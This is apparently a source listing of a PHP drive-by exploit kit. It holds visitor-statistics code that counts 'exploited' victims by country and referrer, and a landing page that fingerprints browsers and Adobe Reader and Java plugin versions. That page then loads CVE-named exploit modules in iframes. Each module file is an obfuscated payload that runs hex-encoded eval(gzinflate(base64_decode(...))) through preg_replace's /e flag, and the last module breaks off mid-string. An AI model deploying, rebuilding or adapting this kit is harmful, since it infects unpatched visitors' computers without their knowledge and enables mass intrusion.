437 | 				$tempPorcentage = $otherCountriesExploitedCount * 100 / $otherCountriesVisitorsCount;
438 | 				echo("
439 | 						<tr>							
440 | 							<td>Other</td>
441 | 							<td>{$otherCountriesVisitorsCount}</td>
442 | 							<td>{$otherCountriesExploitedCount}</td>
443 | 							<td>" . round($tempPorcentage, 2) . "%</td>
444 | 						</tr>"
445 | 				);
446 | 			}
447 | 			echo("</table>");
448 | 			
449 | 			
450 | 		}
451 | 
452 | 		function showVisitorsReferrerTop()
453 | 		{
454 | 			$cq = new CQuery();
455 | 			$sql_result = mysql_query('SELECT * FROM `' . $this->sqlSettings['tableVisitorsList'] . "`");
456 | 			$countryStack = array();
457 | 			$countryStackCount = array();
458 | 			$countryStackExploitedCount = array();
459 | 			while($row = $cq->fetchassoc($sql_result))
460 | 			{
461 | 				if($row['referrer']=="") continue;
462 | 				if($this->getElementExistsInArray($row['referrer'],$countryStack))
463 | 				{
464 | 					$countryIndex = $this->getElementIndexInArray($row['referrer'], $countryStack);
465 | 					$countryStackCount[$countryIndex] = $countryStackCount[$countryIndex] + 1;
466 | 					if($row['exploited'])
467 | 					{
468 | 						$countryStackExploitedCount[$countryIndex] = $countryStackExploitedCount[$countryIndex] + 1;
469 | 					}
470 | 				}
471 | 				else
472 | 				{
473 | 					array_push($countryStack, $row['referrer']);
474 | 					array_push($countryStackCount, 1);
475 | 					if($row['exploited'])
476 | 					{
477 | 						array_push($countryStackExploitedCount, 1);
478 | 					}
479 | 					else
480 | 					{
481 | 						array_push($countryStackExploitedCount, 0);
482 | 					}
483 | 				}
484 | 			}
485 | 
486 | 			arsort($countryStackCount);
487 | 			
488 | 			$this->sortArrayByArray($countryStack, $countryStackCount);
489 | 			$display = 5;
490 | 			$displayCount = 0;
491 | 			$otherCountriesCount = 0;
492 | 			$otherCountriesVisitorsCount = 0;
493 | 			$otherCountriesExploitedCount = 0;
494 | 			$nCountryStack = array();
495 | 			$nCountryStackCount = array();
496 | 			$nCountryStackExploitedCount = array();
497 | 			$nCountryStackExploitedCountries = array();
498 | 			$row = $countryStackCount;
499 | 			
500 | 			echo(
501 | 				"<table>
502 | 					<tr>
503 | 						<td>Refferer</td>
504 | 						<td style=\"width: 60px;\">Total</td>
505 | 						<td style=\"width: 60px;\">Exploited</td>
506 | 						<td style=\"width: 60px;\">%</td>
507 | 					</tr>"
508 | 			);
509 | 			
510 | 			foreach($row as $countryCount){
511 | 				$kindex = key($row);
512 | 				if($displayCount == $display)
513 | 				{
514 | 					$otherCountriesVisitorsCount = $otherCountriesVisitorsCount + $countryCount;
515 | 					$otherCountriesCount = $otherCountriesCount + 1;
516 | 					$otherCountriesExploitedCount = $otherCountriesExploitedCount + $countryStackExploitedCount[$kindex];
517 | 				}
518 | 				else
519 | 				{
520 | 					$tempPorcentage = $countryStackExploitedCount[$kindex] * 100 / $countryCount;
521 | 					echo("
522 | 							<tr>								
523 | 								<td>{$countryStack[$kindex]}</td>
524 | 								<td>{$countryCount}</td>
525 | 								<td>{$countryStackExploitedCount[$kindex]}</td>
526 | 								<td>" . round($tempPorcentage, 2) . "%</td>
527 | 							</tr>"
528 | 					);
529 | 					array_push($nCountryStack, $countryStack[$kindex]);
530 | 					array_push($nCountryStackCount, $countryCount);
531 | 					
532 | 					if($countryStackExploitedCount[$kindex])
533 | 					{
534 | 						array_push($nCountryStackExploitedCount, $countryStackExploitedCount[$kindex]);
535 | 						array_push($nCountryStackExploitedCountries, $countryStack[$kindex]);
536 | 					}
537 | 					
538 | 					$displayCount = $displayCount + 1;
539 | 				}
540 | 				next($row);
541 | 			} 
542 | 			
543 | 			if($otherCountriesVisitorsCount)
544 | 			{
545 | 				array_push($nCountryStack, "Others");
546 | 				array_push($nCountryStackCount, $otherCountriesVisitorsCount);
547 | 				array_push($nCountryStackExploitedCountries, "Others");
548 | 				array_push($nCountryStackExploitedCount, $otherCountriesExploitedCount);
549 | 			}
550 | 			
551 | 			if($otherCountriesVisitorsCount != 0)
552 | 			{
553 | 				$tempPorcentage = $otherCountriesExploitedCount * 100 / $otherCountriesVisitorsCount;
554 | 				echo("
555 | 						<tr>
556 | 							<td>Other</td>
557 | 							<td>{$otherCountriesVisitorsCount}</td>
558 | 							<td>{$otherCountriesExploitedCount}</td>
559 | 							<td>" . round($tempPorcentage, 2) . "%</td>
560 | 						</tr>"
561 | 				);
562 | 			}
563 | 			echo("</table>");
564 | 			
565 | 			
566 | 		}
567 | 
568 | 		function sortArrayByArray($array,$orderArray) {
569 | 			$ordered = array();
570 | 			foreach($orderArray as $key) {
571 | 				if(array_key_exists($key,$array)) {
572 | 						$ordered[$key] = $array[$key];
573 | 						unset($array[$key]);
574 | 				}
575 | 			}
576 | 			return $ordered + $array;
577 | 		}
578 | 
579 | 		function getElementExistsInArray($element, $array)
580 | 		{
581 | 			for($i = 0; $i < count($array); $i++)
582 | 			{
583 | 				if(strcasecmp($array[$i], $element)==0)
584 | 				{
585 | 					return true;
586 | 				}
587 | 			}
588 | 			return false;
589 | 		}
590 | 		
591 | 		function getElementIndexInArray($element, $array)
592 | 		{
593 | 			for($i = 0; $i < count($array); $i++)
594 | 			{
595 | 				if(strcasecmp($array[$i], $element)==0)
596 | 				{
597 | 					return $i;
598 | 				}
599 | 			}
600 | 			return false;
601 | 		}
602 | 		
603 | 		function showVisitorsList()
604 | 		{
605 | 			$cq =  new CQuery();
606 | 			$sql_result = $cq->query("SELECT * FROM `" . $this->sqlSettings['tableVisitorsList'] . "`");
607 | 			echo <<<HTML
608 | 				<table>
609 | 					<tr>
610 | 						<td class="header">Id</td>
611 | 						<td class="header">Ip Address</td>
612 | 						<td class="header">Country</td>
613 | 						<td class="header">Exploited</td>
614 | 					</tr>
615 | HTML;
616 | 			while($row = $cq->fetchassoc($sql_result)) {
617 | 				$sql_result2 = $cq->query("SELECT * FROM `" . $this->sqlSettings['dbVisitorsExploits'] . "` WHERE visitor_id ='" .mysql_real_escape_string($row['id']) . "'");
618 | 				echo("<tr>");
619 | 				echo("<td>" . $row['id'] . "</td>");
620 | 				echo("<td>" . $row['ipAddress'] . "</td>");
621 | 				echo("<td>");
622 | 				echo($row['country'] . "</td>");
623 | 				echo("<td>");
624 | 				if($row['exploited'])
625 | 				{
626 | 					echo("YES");
627 | 				} else {
628 | 					echo("NO");
629 | 				}
630 | 				echo("</td>");
631 | 				echo("</tr>");
632 | 			}
633 | 			echo("</table>");
634 | 		}
635 | 	}
636 | ?>
637 | 


--------------------------------------------------------------------------------
/index.php:
--------------------------------------------------------------------------------
  1 | <?
  2 | 
  3 | 
  4 | include_once('config.php');
  5 | 
  6 | include("include/browser.php");
  7 | 
  8 | $browser = new Browser();
  9 | $data = $browser->identification();
 10 | 
 11 | if(($data['browser'] != "FIREFOX" && $data['browser'] != "CHROME" && $data['browser'] != "SAFARI" && $data['browser'] != "OPERA" && $data['browser'] != "MSIE") || $data['platform'] == "OTHER"){
 12 | 	exit();
 13 | }
 14 | 
 15 | ?>
 16 | <body>
 17 | 
 18 | <? 
 19 | if($reuse_iframe){
 20 | 	echo "<iframe id='reuse_frame'></iframe>";
 21 | }
 22 | ?>
 23 | 
 24 | </body>
 25 | <script type="text/javascript" src="include/PluginDetect.js"></script>
 26 | <script type="text/javascript">
 27 | 
 28 | function getVersion(str){
 29 | 
 30 | 	if(str=="Acrobat"){
 31 | 
 32 | 		var a_version=new Object();
 33 | 		a_version.exists=false;
 34 | 		a_version.version='0';
 35 | 		
 36 | 		var a_detect = PluginDetect.getVersion("AdobeReader");
 37 | 		if(a_detect!=null){
 38 | 			a_version.exists=true;
 39 | 			var vArray = a_detect.split(",");
 40 | 			a_version.version = vArray[0] + vArray[1] + vArray[2];
 41 | 		}	
 42 | 		return a_version;
 43 | 
 44 | 	}
 45 | 	if(str=="Java"){
 46 | 		var j_version=new Object();
 47 | 		j_version.exists=false;
 48 | 		j_version.version='0';
 49 | 		j_version.build='0';
 50 | 		
 51 | 		var j_detect = PluginDetect.getVersion('Java', 'include/getJavaInfo.jar')
 52 | 
 53 | 		if(j_detect!=null){
 54 | 			j_version.exists=true;
 55 | 			var vArray = j_detect.split(",");
 56 | 			j_version.version = vArray[1];
 57 | 			j_version.build = vArray[3];
 58 | 		}	
 59 | 		return j_version;		
 60 | 	}
 61 | 
 62 | }
 63 | 
 64 | var FramesArray = new Array();
 65 | var CurrentModule = 0;
 66 | 
 67 | function InitializeVisitor(){	
 68 | 	var newDIV = document.createElement("div");
 69 | 	newDIV.innerHTML = "<iframe src='add_visitor.php?referrer=<? echo getenv('HTTP_REFERER'); ?>'></iframe>";	
 70 | 	document.body.appendChild(newDIV);	
 71 | }
 72 | 
 73 | function NextModule(){
 74 | 
 75 | 	<? 
 76 | 	if($reuse_iframe){
 77 | 	?>
 78 | 	document.getElementById('reuse_frame').src = FramesArray[CurrentModule];
 79 | 	<?
 80 | 	}else{
 81 | 	?>
 82 | 	var newDIV=document.createElement("div");
 83 | 	newDIV.innerHTML="<iframe src='" + FramesArray[CurrentModule] + "'></iframe>";	
 84 | 	document.body.appendChild(newDIV);
 85 | 	<?
 86 | 	}
 87 | 	?>
 88 | 
 89 | 	if(CurrentModule < FramesArray.length - 1){
 90 | 		CurrentModule++;
 91 | 		setTimeout("NextModule()", <? echo $exploit_delay; ?>);
 92 | 	}
 93 | }
 94 | 
 95 | function AcrobatModule(){
 96 | 	var a_version = getVersion("Acrobat");
 97 | 	if(a_version.exists){	
 98 | 		if(a_version.version >= 800 && a_version.version < 821){
 99 | 			FramesArray.push("load_module.php?e=Adobe-80-2010-0188");			
100 | 		}else if(a_version.version >= 900 && a_version.version < 940){
101 | 			if(a_version.version < 931){				
102 | 				FramesArray.push("load_module.php?e=Adobe-90-2010-0188");
103 | 			}else if(a_version.version < 933){		
104 | 				FramesArray.push("load_module.php?e=Adobe-2010-1297");
105 | 
106 | 			}else if(a_version.version < 940){		
107 | 				FramesArray.push("load_module.php?e=Adobe-2010-2884");
108 | 			}	
109 | 		}else if(a_version.version >= 700 && a_version.version < 711){
110 | 			FramesArray.push("load_module.php?e=Adobe-2008-2992");
111 | 		}
112 | 	}	
113 | }
114 | function JavaModule(){
115 | 	var j_version = getVersion("Java");
116 | 	if(j_version.exists){	
117 | 		if(j_version.version < 6 || (j_version.version == 6 && j_version.build < 19)){
118 | 			FramesArray.push("load_module.php?e=Java-2010-0842");
119 | 		
120 | <?
121 | if($data['browser'] == "MSIE"){
122 | ?>
123 | 
124 | 		}else if(j_version.version == 6 && j_version.build < 22){
125 | 			FramesArray.push("load_module.php?e=Java-2010-3552");
126 | 
127 | <?
128 | }
129 | ?>
130 | 		
131 | 		}
132 | 	}	
133 | }
134 | function SignedModule(){
135 | 	var j_version = getVersion("Java");
136 | 	if(j_version.exists){	
137 | 		FramesArray.push("load_module.php?e=JavaSignedApplet");
138 | 	}
139 | }
140 | 
141 | InitializeVisitor();
142 | 
143 | JavaModule();
144 | 
145 | AcrobatModule();
146 | 
147 | <? if($enable_signed) echo "SignedModule();"; ?>
148 | 
149 | if(FramesArray.length > 0){
150 | 	NextModule();
151 | }
152 | 
153 | </script>
154 | 


--------------------------------------------------------------------------------
/install/index.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 	include_once('../config.php');
 4 | 	include_once('../include/sql.php');
 5 | 	include_once('../include/visitors.php');
 6 | 
 7 | 	$sql = new CSQL($sqlSettings);
 8 | 	$sql->open();
 9 | 	
10 | 	createTables($sqlSettings);
11 | 
12 | 	echo "Installation Complete.<br>";
13 | 
14 | 	$sql->close();
15 | 
16 | 	function createTables($sqlSettings)
17 | 		{
18 | 			$cq = new CQuery();
19 | 			echo("Creating Table " . $sqlSettings['tableVisitorsList'] . "<br>");
20 | 			
21 | 			$sql_result = mysql_query(" DROP TABLE IF EXISTS  `" . $sqlSettings['dbName'] . "`.`" . $sqlSettings['tableVisitorsList'] . "`");
22 | 			$sql_result = mysql_query("
23 | 				CREATE TABLE IF NOT EXISTS `" . $sqlSettings['dbName'] . "`.`" . $sqlSettings['tableVisitorsList'] . "` (
24 | 				`id` INT AUTO_INCREMENT ,
25 | 				`ipAddress` VARCHAR( 16 ),
26 | 				`userAgent` VARCHAR( 400 ),
27 | 				`country` VARCHAR( 400 ),
28 | 				`referrer` VARCHAR( 400 ),
29 | 				`exploited` BOOL,
30 | 				`exploit` VARCHAR( 400 ),				
31 | 				PRIMARY KEY ( `id` )
32 | 				) ENGINE = MYISAM ;");
33 | 						
34 | 			echo("Tables Created.<br>");
35 | 		}
36 | 	
37 | ?>
38 | 


--------------------------------------------------------------------------------
/load_module.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | include_once('config.php');
 5 | 
 6 | include("include/browser.php");
 7 | 
 8 | $browser = new Browser();
 9 | $data = $browser->identification();
10 | 
11 | if(($data['browser'] != "FIREFOX" && $data['browser'] != "CHROME" && $data['browser'] != "SAFARI" && $data['browser'] != "OPERA" && $data['browser'] != "MSIE") || $data['platform'] == "OTHER"){
12 | 	exit();
13 | }
14 | 
15 | include_once('include/sql.php');
16 | include_once('include/visitors.php');
17 | $sql = new CSQL($sqlSettings);
18 | $sql->open();
19 | 	
20 | $cvisitors = new CVisitors($sql, $sqlSettings);
21 | $exploited = $cvisitors->checkVisitor($_SERVER['HTTP_USER_AGENT'], $cvisitors->getIpAddr(), $cvisitors->getIpAddrCountry($cvisitors->getIpAddr()));
22 | $sql->close();
23 | 
24 | if($exploited){
25 | 	exit();
26 | }
27 | 
28 | 
29 | $page = $_GET["e"];
30 | 
31 | $pos = strpos($page, "..");
32 | 
33 | 
34 | if($page != "" && isset($page) && $pos === false ){
35 | 	$inc = "modules/" . $page . ".php";
36 | 	
37 | 	if(file_exists($inc)){
38 | 		
39 | 		require_once($inc);
40 | 	
41 | 	}else{
42 | 		
43 | 		require_once("modules/index.php");
44 | 
45 | 	}
46 | 
47 | }else{
48 | 	
49 | 	require_once("modules/index.php");
50 | 
51 | }
52 | 
53 | 
54 | 
55 | ?>
56 | 


--------------------------------------------------------------------------------
/modules/Adobe-2008-2992.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVTJDqNWEPyXuUwSooDhPRZFObCazRib1Wik6LEvBgwYDHx9mMxIyaFU6qrqQ/ehXmNW/D1mrydKsl++4H/8hmdffv/ybaXht5WhDz4dEL+tJHswc2j8wdwB+QD9w/ueYcCPnX9z5E+N+qFRR446fKgc888c/d3730yyX3ffVuvZOiv2Fs5ofZ/v0V5cZaklZAfsvCqdxZuq9U67tzpjsNSJufJ5rqYlYZZ+6klz8Qa4X3k5gEpIp5BN7RiL03yfwngk2fxMWHgsrvtFhTxuFRrTSiShORJ2szc+i00MwnJAWLpQtiwBiiWmor6vABvv+16v+07lS+iqUk6pxImKTn6TKMz4XEdHgSeCsikn0tkQOCY3dHQBPa5AvFKXQqPxp3pyjaGFN1Rs2e1hPdAHNLN4c9xQn+3XtBYF0WzNdM5osI5woAtUBUUf3LDcaf0ZpOG1x2b/Kl6Nj2Dk72pEiPfSOgNunbBqrFgxk9Bm5uFLSSzQZgXxQTtUx2BLjuPvc36Odi92lTnoQaljDrho2qcTUP+B54sQOoACDDyBJ0jm3DjHNwRZV4sualdcFuslahnKY6lPpWjdu0v06QHJ7qMjpwQhbQZ0mfL+kazteHvDhgHXABdeDfKSWak60r7WyWzLt6pbBTjEELOQpoPvUjuarc5/GlTPj0judiDSusq/lrRAhlIl+YfsUb1HGLFuRN/RNS8jbTCQx5FM2QCtzyfVP7tiNUSzn1Zk3GNEWlmvtiWqtfP9560+FejCB5FODbqcQmFNVta/OaeXM2wspE9VU5EefDYukRpS6/Uro3kD79Mw5QJSIYkqDJoxOTHVhSHEWKUXLSPtnSjdynS1LTXawGm3yUdjv75r11lEZPc7aSqnmy8M5W4lvSVkD8guTCAH0Sc6E/o+tk9B1x970LyjSzPV3BNHiLh7HKyYZI5I1pw5UL+43g+NKaGq8vMmmRO5PSb2bZaToOAtsGcNZc3Q7C9i2kl1w31PCrK8GxQApvJGZBBfg+Ce5C2lFPrsz931TTkPaAdRJPHnunqXj9Si8v0uPveexcS+GMhVq9CSBi2m8y2PLXTevnNa6u0wGa1QYJx77Yov8rl2TKL5Txsy7U0zlEdwSXKqcqelji7VVbHbFkOyGHmDKRBZc6VuPHgBbAZoS7umwhTsQ5KZhcq7qsdjqqMW83xk9JjrjbIgj6T0nD5mlz9C+cyFKadQlBnxxV01iOOC2j8viGu2t2ZRdrvopY7cTnzUe4OlAbuvmshI9KBPj4rF3OUl0lq3mVrGZCGVK8ZbBOQiTuZurlvdUbFbRWmuY2uWxSMgFRben3TC0lHYDKkNbZqB5uevv74ezcT9B0o4yvHLr3/+Aw=='\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/modules/Adobe-2010-1297.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/modules/Adobe-2010-2884.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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